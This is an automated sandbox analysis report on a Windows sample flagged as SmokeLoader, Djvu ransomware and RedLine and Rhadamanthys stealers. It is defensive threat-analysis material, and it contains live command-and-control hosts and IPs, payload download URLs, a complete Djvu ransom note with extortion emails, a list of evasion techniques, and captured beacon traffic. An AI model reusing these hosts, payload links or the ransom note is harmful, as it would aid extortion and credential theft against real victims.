Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 791287
MD5: 6def34b7d9603c4fc7953f177f73c21a
SHA1: 82d464aedae69e9fa5ad521ceed3840595f3ad2f
SHA256: 277e1518b909735b16f393b7077e453735eb4d2dd651891f9f73da605941493b
Tags: exe
Detection

Djvu, RHADAMANTHYS, RedLine, SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Detected unpacking (overwrites its own PE header)
Yara detected AntiVM3
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Yara detected RHADAMANTHYS Stealer
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Yara detected Djvu Ransomware
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Hides threads from debuggers
Writes to foreign memory regions
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Yara detected Keylogger Generic
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to call native functions
Contains functionality to read the clipboard data
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Installs a raw input device (often for capturing keystrokes)
Allocates memory with a write watch (potentially for evading sandboxes)
Detected TCP or UDP traffic on non-standard ports
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Classification

AV Detection

Source: http://potunulit.org:80/N Avira URL Cloud: Label: malware
Source: http://potunulit.org/J2v-m Avira URL Cloud: Label: malware
Source: http://drampik.com/lancer/get.php Avira URL Cloud: Label: malware
Source: http://potunulit.org/s Avira URL Cloud: Label: malware
Source: potunulit.org Virustotal: Detection: 11%
Source: C:\Users\user\AppData\Local\Temp\43D0.exe ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Local\Temp\4434343.dll ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe ReversingLabs: Detection: 43%
Source: C:\Users\user\AppData\Local\Temp\C676.exe ReversingLabs: Detection: 80%
Source: file.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\beirutt Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\4434343.dll Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\C676.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\43D0.exe Joe Sandbox ML: detected
Source: 00000000.00000002.397037744.00000000005F1000.00000004.10000000.00040000.00000000.sdmp Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://bulimu55t.net/", "http://soryytlic4.net/", "http://bukubuka1.net/", "http://novanosa5org.org/", "http://hujukui3.net/", "http://newzelannd66.org/", "http://golilopaster.org/"]}
Source: 00000008.00000002.479914181.0000000004980000.00000040.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Djvu {"Download URLs": ["http://uaery.top/dl/build2.exe", "http://drampik.com/files/1/build3.exe"], "C2 url": "http://drampik.com/lancer/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-cud8EGMtyB\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0637JOsie", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", 
"C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Wi
Source: 9.3.C4AA.exe.df30000.1.unpack Malware Configuration Extractor: RedLine {"C2 url": ["89.208.103.88:37538"], "Bot Id": "birj proliv", "Authorization Header": "9941068ef2768ed5ba54fc3eed22d795"}

Compliance

Source: C:\Users\user\AppData\Local\Temp\C676.exe Unpacked PE file: 6.2.C676.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\43D0.exe Unpacked PE file: 10.2.43D0.exe.400000.0.unpack
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: Binary string: wkernel32.pdb source: fontview.exe, 0000000D.00000003.515386318.0000000004D70000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.514698930.0000000004C4C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WINMMBASE.pdbUGP source: fontview.exe, 0000000D.00000003.562076898.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ucrtbase.pdb source: fontview.exe, 0000000D.00000003.526678012.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.526108390.0000000004C4D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: msvcrt.pdb source: fontview.exe, 0000000D.00000003.521974726.0000000004C4E000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.522197906.0000000004D10000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wrpcrt4.pdb source: fontview.exe, 0000000D.00000003.523535376.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.522585923.0000000004C4F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: fontview.exe, 0000000D.00000002.574375673.0000000004DE0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.511481087.0000000004C44000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.510890139.0000000004C46000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: shcore.pdb source: fontview.exe, 0000000D.00000003.535582414.0000000004C45000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wwin32u.pdbGCTL source: fontview.exe, 0000000D.00000003.529166790.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: bcryptprimitives.pdbUGP source: fontview.exe, 0000000D.00000003.524433598.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: _C:\fepovilorefego5.pdb source: explorer.exe, 00000003.00000003.445965683.0000000004AC0000.00000004.00000001.00020000.00000000.sdmp, C676.exe, 00000006.00000000.445306622.0000000000401000.00000020.00000001.01000000.00000006.sdmp, C676.exe.3.dr
Source: Binary string: setupapi.pdbUGP source: fontview.exe, 0000000D.00000003.564997815.0000000005178000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.567165020.00000000055B0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wgdi32.pdb source: fontview.exe, 0000000D.00000003.524543402.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: fltLib.pdb source: fontview.exe, 0000000D.00000003.557086498.0000000004B20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: advapi32.pdb source: fontview.exe, 0000000D.00000003.521207061.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wsspicli.pdb source: fontview.exe, 0000000D.00000003.524283148.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: winmm.pdbUGP source: fontview.exe, 0000000D.00000003.561765846.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cfgmgr32.pdbUGP source: fontview.exe, 0000000D.00000003.546083701.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\nujiwucosunes\vezik.pdb source: explorer.exe, 00000003.00000003.463370159.0000000006570000.00000004.00000001.00020000.00000000.sdmp, 43D0.exe, 00000008.00000002.477465572.0000000000401000.00000020.00000001.01000000.00000008.sdmp, 43D0.exe, 00000008.00000000.462284028.0000000000401000.00000020.00000001.01000000.00000008.sdmp, 43D0.exe, 0000000A.00000000.475726435.0000000000401000.00000020.00000001.01000000.00000008.sdmp
Source: Binary string: shell32.pdb source: fontview.exe, 0000000D.00000003.543911919.00000000064F0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.541667280.0000000005177000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 43D0.exe, 00000008.00000002.479914181.0000000004980000.00000040.00001000.00020000.00000000.sdmp, 43D0.exe, 0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: wrpcrt4.pdbUGP source: fontview.exe, 0000000D.00000003.523535376.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.522585923.0000000004C4F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Timayiko\Kodale\hiwer\Fami\Somayofa wiho.pdb source: C4AA.exe, 00000009.00000000.469180879.00000000009BC000.00000002.00000001.01000000.00000009.sdmp, C4AA.exe, 00000009.00000002.573291842.00000000009BC000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: msvcp_win.pdb source: fontview.exe, 0000000D.00000003.525933343.0000000004C40000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000002.581848569.0000000004F70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: psapi.pdbUGP source: fontview.exe, 0000000D.00000003.564929757.0000000004B20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wgdi32.pdbUGP source: fontview.exe, 0000000D.00000003.524543402.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdb source: fontview.exe, 0000000D.00000003.516786735.0000000004F75000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.518946338.0000000005160000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wimm32.pdb source: fontview.exe, 0000000D.00000003.557166889.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mpr.pdb source: fontview.exe, 0000000D.00000003.569388235.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: shlwapi.pdb source: fontview.exe, 0000000D.00000003.529256728.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wsspicli.pdbGCTL source: fontview.exe, 0000000D.00000003.524283148.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wwin32u.pdb source: fontview.exe, 0000000D.00000003.529166790.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: shlwapi.pdbUGP source: fontview.exe, 0000000D.00000003.529256728.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: setupapi.pdb source: fontview.exe, 0000000D.00000003.564997815.0000000005178000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.567165020.00000000055B0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 3C:\nujiwucosunes\vezik.pdb` source: explorer.exe, 00000003.00000003.463370159.0000000006570000.00000004.00000001.00020000.00000000.sdmp, 43D0.exe, 00000008.00000002.477465572.0000000000401000.00000020.00000001.01000000.00000008.sdmp, 43D0.exe, 00000008.00000000.462284028.0000000000401000.00000020.00000001.01000000.00000008.sdmp, 43D0.exe, 0000000A.00000000.475726435.0000000000401000.00000020.00000001.01000000.00000008.sdmp
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 43D0.exe, 00000008.00000002.479914181.0000000004980000.00000040.00001000.00020000.00000000.sdmp, 43D0.exe, 0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: combase.pdbUGP source: fontview.exe, 0000000D.00000003.531161871.00000000053E0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.529637383.0000000005173000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ucrtbase.pdbUGP source: fontview.exe, 0000000D.00000003.526678012.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.526108390.0000000004C4D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdbUGP source: fontview.exe, 0000000D.00000003.516786735.0000000004F75000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.518946338.0000000005160000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cryptbase.pdbUGP source: fontview.exe, 0000000D.00000003.524332169.0000000004B20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wuser32.pdbUGP source: fontview.exe, 0000000D.00000003.528194183.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.527333609.0000000004C49000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: shell32.pdbUGP source: fontview.exe, 0000000D.00000003.543911919.00000000064F0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.541667280.0000000005177000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: fltLib.pdbGCTL source: fontview.exe, 0000000D.00000003.557086498.0000000004B20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wimm32.pdbUGP source: fontview.exe, 0000000D.00000003.557166889.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: WINMMBASE.pdb source: fontview.exe, 0000000D.00000003.562076898.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: comdlg32.pdb source: fontview.exe, 0000000D.00000003.533865783.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.533344603.0000000004C4D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wgdi32full.pdbUGP source: fontview.exe, 0000000D.00000003.525163286.0000000004FEC000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.524730073.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: profapi.pdb source: fontview.exe, 0000000D.00000003.551602215.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ws2_32.pdb source: fontview.exe, 0000000D.00000003.564725237.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: comdlg32.pdbUGP source: fontview.exe, 0000000D.00000003.533865783.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.533344603.0000000004C4D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wgdi32full.pdb source: fontview.exe, 0000000D.00000003.525163286.0000000004FEC000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.524730073.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: shcore.pdbUGP source: fontview.exe, 0000000D.00000003.535582414.0000000004C45000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mpr.pdbUGP source: fontview.exe, 0000000D.00000003.569388235.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: sechost.pdb source: fontview.exe, 0000000D.00000003.522483287.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: XAMLHostHwndvolumelabelmasteredudfhelpJOLIETUDFData\Program Files\$Windows.~BT\Windows\ProgramData\Program Files (x86)\Program Files\Data\Windows\Data\ProgramData\Data\Program Files (x86)\.cer.cdxml.cat.automaticdestinations-ms.appxpackage.appxbundle.appxWindows.old\.fon.etl.efi.dsft.dmp.customdestinations-ms.cookie.msm.msip.mpb.mp.p12.p10.otf.ost.olb.ocx.nst.mui.pdb.partial.p7x.p7s.p7r.p7m.p7c.p7b.psf.psd1.pfx.pfm.pem.ttc.sys.sst.spkg.spc.sft.rll.winmd.wim.wfs.vsix.vsi.vmrs.vmcxWININET.xap%s (%d).%s\shellIfExecBrowserFlagsft%06dNeverShowExtAlwaysShowExtTopicL source: fontview.exe, 0000000D.00000003.543911919.00000000064F0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.541667280.0000000005177000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: fontview.exe, 0000000D.00000002.574375673.0000000004DE0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.511481087.0000000004C44000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.510890139.0000000004C46000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\fepovilorefego5.pdb source: explorer.exe, 00000003.00000003.445965683.0000000004AC0000.00000004.00000001.00020000.00000000.sdmp, C676.exe, 00000006.00000000.445306622.0000000000401000.00000020.00000001.01000000.00000006.sdmp, C676.exe.3.dr
Source: Binary string: ole32.pdbUGP source: fontview.exe, 0000000D.00000003.559665938.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.557527438.0000000004C40000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\xayagejutuximo.pdb source: file.exe, beirutt.3.dr
Source: Binary string: winmm.pdb source: fontview.exe, 0000000D.00000003.561765846.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: powrprof.pdbUGP source: fontview.exe, 0000000D.00000003.556519697.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: powrprof.pdb source: fontview.exe, 0000000D.00000003.556519697.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wmswsock.pdb source: fontview.exe, 0000000D.00000002.573666518.0000000004B40000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.569483421.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ole32.pdb source: fontview.exe, 0000000D.00000003.559665938.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.557527438.0000000004C40000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Kernel.Appcore.pdbUGP source: fontview.exe, 0000000D.00000003.550884226.0000000004B20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: sechost.pdbUGP source: fontview.exe, 0000000D.00000003.522483287.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdbGCTL source: fontview.exe, 0000000D.00000003.515386318.0000000004D70000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.514698930.0000000004C4C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: comctl32.pdbUGP source: fontview.exe, 0000000D.00000003.552104294.0000000005172000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.554344562.0000000005380000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Kernel.Appcore.pdb source: fontview.exe, 0000000D.00000003.550884226.0000000004B20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: psapi.pdb source: fontview.exe, 0000000D.00000003.564929757.0000000004B20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: msvcp_win.pdbUGP source: fontview.exe, 0000000D.00000003.525933343.0000000004C40000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000002.581848569.0000000004F70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: advapi32.pdbUGP source: fontview.exe, 0000000D.00000003.521207061.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cryptbase.pdb source: fontview.exe, 0000000D.00000003.524332169.0000000004B20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: oleaut32.pdbUGP source: fontview.exe, 0000000D.00000003.563958937.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.562324690.0000000004C4F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bcryptprimitives.pdb source: fontview.exe, 0000000D.00000003.524433598.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cfgmgr32.pdb source: fontview.exe, 0000000D.00000003.546083701.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: combase.pdb source: fontview.exe, 0000000D.00000003.531161871.00000000053E0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.529637383.0000000005173000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: profapi.pdbUGP source: fontview.exe, 0000000D.00000003.551602215.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wmswsock.pdbUGP source: fontview.exe, 0000000D.00000002.573666518.0000000004B40000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.569483421.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: oleaut32.pdb source: fontview.exe, 0000000D.00000003.563958937.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.562324690.0000000004C4F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TC:\xayagejutuximo.pdb$~B|.@ source: file.exe, beirutt.3.dr
Source: Binary string: wuser32.pdb source: fontview.exe, 0000000D.00000003.528194183.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.527333609.0000000004C49000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: comctl32.pdb source: fontview.exe, 0000000D.00000003.552104294.0000000005172000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.554344562.0000000005380000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ws2_32.pdbUGP source: fontview.exe, 0000000D.00000003.564725237.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_00428390 FindFirstFileExW, 6_2_00428390

Networking

Source: C:\Windows\explorer.exe Domain query: potunulit.org
Source: C:\Windows\explorer.exe Network Connect: 188.114.96.3 80
Source: Malware configuration extractor URLs: http://drampik.com/lancer/get.php
Source: Malware configuration extractor URLs: 89.208.103.88:37538
Source: Malware configuration extractor URLs: http://bulimu55t.net/
Source: Malware configuration extractor URLs: http://soryytlic4.net/
Source: Malware configuration extractor URLs: http://bukubuka1.net/
Source: Malware configuration extractor URLs: http://novanosa5org.org/
Source: Malware configuration extractor URLs: http://hujukui3.net/
Source: Malware configuration extractor URLs: http://newzelannd66.org/
Source: Malware configuration extractor URLs: http://golilopaster.org/
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ryjphgb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 164Host: potunulit.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://egqgnqk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 215Host: potunulit.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aygtqn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 237Host: potunulit.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fedface.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 291Host: potunulit.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pghirnwb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 218Host: potunulit.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hkrpyqspb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 284Host: potunulit.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jwoitvech.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 280Host: potunulit.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fedbh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 331Host: potunulit.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fyugji.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 152Host: potunulit.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mlleyedksk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 341Host: potunulit.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vjawtynvst.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 253Host: potunulit.org
